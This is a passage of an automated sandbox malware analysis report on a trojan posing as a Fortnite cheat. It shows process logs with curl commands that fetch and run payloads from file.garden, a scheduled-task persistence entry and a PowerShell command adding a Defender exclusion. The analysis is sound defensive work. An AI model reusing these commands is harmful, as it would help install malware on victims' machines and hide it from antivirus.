                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004492F012_2_004492F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043E2A012_2_0043E2A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004012B312_2_004012B3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040135912_2_00401359
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041636112_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042D3CC12_2_0042D3CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004493D012_2_004493D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004483B012_2_004483B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004113BD12_2_004113BD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040546012_2_00405460
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044742912_2_00447429
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004094D712_2_004094D7
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040A4E012_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042B49012_2_0042B490
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004074B012_2_004074B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B57012_2_0040B570
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004366E012_2_004366E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041D6A012_2_0041D6A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044970012_2_00449700
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004117C012_2_004117C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042F7DB12_2_0042F7DB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040885012_2_00408850
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040389012_2_00403890
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A8B012_2_0044A8B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004488B012_2_004488B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043697012_2_00436970
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0045392E12_2_0045392E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041399C12_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040AA0012_2_0040AA00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00427AFB12_2_00427AFB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042BC5012_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00413CC612_2_00413CC6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042CCDD12_2_0042CCDD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042CCF512_2_0042CCF5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00429DF212_2_00429DF2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00437D9012_2_00437D90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040CE0012_2_0040CE00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00431E0012_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00415EF612_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407EB012_2_00407EB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00427F6212_2_00427F62
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00443FA012_2_00443FA0
                                Source: C:\Edge\msedge.exeCode function: 16_2_00007FFAAC300D8016_2_00007FFAAC300D80
                                Source: C:\Edge\msedge.exeCode function: 16_2_00007FFAAC6F2B5A16_2_00007FFAAC6F2B5A
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC320D8035_2_00007FFAAC320D80
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC35122535_2_00007FFAAC351225
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC35D30A35_2_00007FFAAC35D30A
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC35BF4235_2_00007FFAAC35BF42
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC3597E035_2_00007FFAAC3597E0
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC330B0635_2_00007FFAAC330B06
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC3311A935_2_00007FFAAC3311A9
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC33177E35_2_00007FFAAC33177E
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 35_2_00007FFAAC330FC735_2_00007FFAAC330FC7
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC36122537_2_00007FFAAC361225
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC36BF4237_2_00007FFAAC36BF42
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC3697E037_2_00007FFAAC3697E0
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC340B0637_2_00007FFAAC340B06
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC330D8037_2_00007FFAAC330D80
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC3411A937_2_00007FFAAC3411A9
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC34177E37_2_00007FFAAC34177E
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 37_2_00007FFAAC340FC737_2_00007FFAAC340FC7
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC310D8038_2_00007FFAAC310D80
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC320B0638_2_00007FFAAC320B06
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC34122538_2_00007FFAAC341225
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC34D30A38_2_00007FFAAC34D30A
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC34BF4238_2_00007FFAAC34BF42
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC3497E038_2_00007FFAAC3497E0
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC3211A938_2_00007FFAAC3211A9
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC32177E38_2_00007FFAAC32177E
                                Source: C:\Edge\msedge.exeCode function: 38_2_00007FFAAC320FC738_2_00007FFAAC320FC7
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC330D8039_2_00007FFAAC330D80
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC36122539_2_00007FFAAC361225
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC36D30A39_2_00007FFAAC36D30A
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC36BF4239_2_00007FFAAC36BF42
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC3697E039_2_00007FFAAC3697E0
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC340B0639_2_00007FFAAC340B06
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC3411A939_2_00007FFAAC3411A9
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC34177E39_2_00007FFAAC34177E
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFAAC340FC739_2_00007FFAAC340FC7
                                Source: C:\Edge\msedge.exeCode function: 42_2_00007FFAAC330D8042_2_00007FFAAC330D80
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 43_2_00007FFAAC320D8043_2_00007FFAAC320D80
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAC330D8049_2_00007FFAAC330D80
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAC36122549_2_00007FFAAC361225
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAC36D30A49_2_00007FFAAC36D30A
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAC36BF4249_2_00007FFAAC36BF42
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAC3697E049_2_00007FFAAC3697E0
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAC340B0649_2_00007FFAAC340B06
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAC3411A949_2_00007FFAAC3411A9
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAC34177E49_2_00007FFAAC34177E
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAC340FC749_2_00007FFAAC340FC7
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 50_2_00007FFAAC340D8050_2_00007FFAAC340D80
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeCode function: 51_2_00007FFAAC310D8051_2_00007FFAAC310D80
                                Source: C:\Edge\msedge.exeCode function: 54_2_00007FFAAC310D8054_2_00007FFAAC310D80
                                Source: C:\Edge\msedge.exeCode function: 54_2_00007FFAAC34122554_2_00007FFAAC341225
                                Source: C:\Edge\msedge.exeCode function: 54_2_00007FFAAC34BF4254_2_00007FFAAC34BF42
                                Source: C:\Edge\msedge.exeCode function: 54_2_00007FFAAC3497E054_2_00007FFAAC3497E0
                                Source: C:\Edge\msedge.exeCode function: 54_2_00007FFAAC320B0654_2_00007FFAAC320B06
                                Source: C:\Edge\msedge.exeCode function: 54_2_00007FFAAC3211A954_2_00007FFAAC3211A9
                                Source: C:\Edge\msedge.exeCode function: 54_2_00007FFAAC32177E54_2_00007FFAAC32177E
                                Source: C:\Edge\msedge.exeCode function: 54_2_00007FFAAC320FC754_2_00007FFAAC320FC7
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ASIzYbXK.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: String function: 00007FF67417E8B0 appears 142 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 0063EB78 appears 39 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 0063EC50 appears 56 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 0063F5F0 appears 31 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CBE0 appears 53 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040EE60 appears 145 times
                                Source: OPvxZeSl.log.16.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: XkTUfoHN.log.16.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: HiOQLkRz.log.16.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: vpYzbqhQ.log.16.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: fnSuHmrC.log.16.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: msedge.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: physmeme.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: LBUPSPkYsNXrxZEtdVzCng.exe.16.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: OPvxZeSl.log.16.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: XkTUfoHN.log.16.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: HiOQLkRz.log.16.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: vpYzbqhQ.log.16.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: fnSuHmrC.log.16.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: 16.2.msedge.exe.132cbd08.14.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@79/58@16/3
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_00626C74 GetLastError,FormatMessageW,6_2_00626C74
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF674174BD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004345E0 CoCreateInstance,12_2_004345E0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0063A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,6_2_0063A6C2
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP
                                Source: C:\Windows\Speech\physmeme.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.logJump to behavior
                                Source: C:\Edge\msedge.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3588:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
                                Source: C:\Edge\msedge.exeMutant created: \Sessions\1\BaseNamedObjects\Local\JFIOSDHSUDFHUSIDGHHDJCXZCHBKLJZGVHSKDFGOIUYDSGYOIYD
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2028:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1792:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4516:120:WilError_03
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\gu021d1qJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: sfxname6_2_0063DF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: sfxstime6_2_0063DF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: STARTDLG6_2_0063DF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: xzg6_2_0063DF1E
                                Source: gh3zRWl4or.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: gh3zRWl4or.exeReversingLabs: Detection: 55%
                                Source: gh3zRWl4or.exeString found in binary or memory: Save/Load
                                Source: gh3zRWl4or.exeString found in binary or memory: Save/Load
                                Source: gh3zRWl4or.exeString found in binary or memory: CombatVisualsWeaponConfigMisc##MainAimbotPredictionTriggerbotTriggerbot Delay (ms)Triggerbot Distance (m)Fov CircleFilled FovFov SizeSmoothingHitboxCorner 2D 3D NothingRankDraw FilledUsernameSnaplineSkeletonFov ArrowsDistanceRender CountWeapon configShotgun SettingsShotgun SmoothShotgun FovSMG SettingsPrediction SMG SmoothSMG FovRifle SettingsPrediction Rifle SmoothRifle FovSniper SettingsPrediction Sniper SmoothSniper Fov(AIR STUCK)RISKY FEATURE:Air StuckUnload##Main1Save/LoadSave Configconfig.jsonLoad Config##MainsLegit ConfigSemi ConfigRage ConfigReaper Sniper RifleBolt-Action Sniper RifleHeavy Sniper RifleStorm Scout Sniper RifleHunting RiflePump ShotgunTactical ShotgunCharge ShotgunSuppressed SMGCompact SMGRapid Fire SMGAssault RifleBurst Assault RifleTactical Assault RifleThermal Scoped Assault RifleScoped Assault RiflePumpShotgunTacticalShotgunChargeShotgunLeverActionShotgunDragonBreathShotgunDoubleBarrelShotgunAutoShotgunSingleShotgunCombatShotgunSlugShotgunVisible Entities: Nearby Entities: HandsBronze 1Bronze 2Bronze 3Silver 1Silver 2Silver 3Gold 1Gold 2Gold 3Platinum 1Platinum 2Platinum 3Diamond 1Diamond 2Diamond 3EliteChampionUnrealUnrankedm] Load Dependencies (Close Game First) Inject Orqur Your choice: cls Driver FoundDriver Error Contact Support. Waiting For FortniteFortniteClient-Win64-Shipping.exeThe driver could not get the base address...Base Address -> VAText -> cr3 -> vector too longmSVUSY
                                Source: unknownProcess created: C:\Users\user\Desktop\gh3zRWl4or.exe "C:\Users\user\Desktop\gh3zRWl4or.exe"
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp" "c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP"
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'
